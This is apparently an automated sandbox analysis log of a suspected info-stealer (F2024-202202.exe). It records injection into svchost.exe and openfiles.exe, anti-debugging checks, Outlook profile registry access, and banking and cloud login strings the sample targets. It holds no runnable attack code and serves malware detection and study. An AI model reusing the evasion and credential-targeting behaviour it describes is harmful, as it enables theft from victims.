            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: F2024-202202.exeStatic file information: File size 1165312 > 1048576
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: F2024-202202.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: OpnFiles.pdb source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2264662254.000000000010E000.00000002.00000001.01000000.00000005.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410177309.000000000010E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001FC304 LoadLibraryA,GetProcAddress,0_2_001FC304
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0018C590 push eax; retn 0018h0_2_0018C599
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A8B85 push ecx; ret 0_2_001A8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A01C push edi; ret 2_2_0041A02C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A023 push edi; ret 2_2_0041A02C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E158 push ss; iretd 2_2_0040E162
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A73 push ebx; retn 5C84h2_2_00415AFB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419AD8 push ebx; retf 2_2_00419B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041537E push edi; iretd 2_2_00415380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413321 push eax; ret 2_2_00413361
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041BC13 push esi; retf 2_2_0041BC1E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041BCFA push eax; iretd 2_2_0041BCFB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415DDC push cs; ret 2_2_00415DE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403580 push eax; ret 2_2_00403582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419583 push edi; iretd 2_2_0041958F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042FE02 push eax; ret 2_2_0042FE04
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0345EB23 push edi; iretd 4_2_0345EB6D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_03463B29 push ecx; retf 4_2_03463B2A
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0345A3D7 push eax; iretd 4_2_0345A3D8
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_03453A5B push edi; iretd 4_2_03453A5D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0345A2F0 push esi; retf 4_2_0345A2FB
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0345EA8D push edi; iretd 4_2_0345EB6D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_034519FE push eax; ret 4_2_03451A3E
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_034581B5 push ebx; retf 4_2_034581DD
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0344C835 push ss; iretd 4_2_0344C83F
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_03458700 push edi; ret 4_2_03458709
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_034586F9 push edi; ret 4_2_03458709
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00184A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00184A35
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_002055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_002055FD
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001A33C7
            Source: C:\Users\user\Desktop\F2024-202202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 5408Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 4563Jump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99846
            Source: C:\Users\user\Desktop\F2024-202202.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 1.3 %
            Source: C:\Windows\SysWOW64\openfiles.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096Thread sleep count: 5408 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096Thread sleep time: -10816000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096Thread sleep count: 4563 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096Thread sleep time: -9126000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_001E4696
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EC93C FindFirstFileW,FindClose,0_2_001EC93C
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001EC9C7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001EF200
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001EF35D
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001EF65E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001E3A2B
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001E3D4E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001EBF27
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0014D4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0014D4E0
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00184AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00184AFE
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3253774022.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: 2y9KZy13.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 2y9KZy13.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 2y9KZy13.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2y9KZy13.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 2y9KZy13.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2y9KZy13.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2y9KZy13.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2y9KZy13.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2y9KZy13.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 2y9KZy13.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2y9KZy13.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2y9KZy13.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2y9KZy13.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2y9KZy13.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2y9KZy13.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: firefox.exe, 00000009.00000002.2682019916.0000026B03A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssDNP
            Source: 2y9KZy13.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 2y9KZy13.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2y9KZy13.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2y9KZy13.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\F2024-202202.exeAPI call chain: ExitProcess graph end nodegraph_0-98432
            Source: C:\Users\user\Desktop\F2024-202202.exeAPI call chain: ExitProcess graph end nodegraph_0-98621
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419023 LdrLoadDll,2_2_00419023
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F41FD BlockInput,0_2_001F41FD
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00183B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00183B4C
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_001B5CCC
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001FC304 LoadLibraryA,GetProcAddress,0_2_001FC304
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_01403540 mov eax, dword ptr fs:[00000030h]0_2_01403540
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_014035A0 mov eax, dword ptr fs:[00000030h]0_2_014035A0
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_01401ED0 mov eax, dword ptr fs:[00000030h]0_2_01401ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
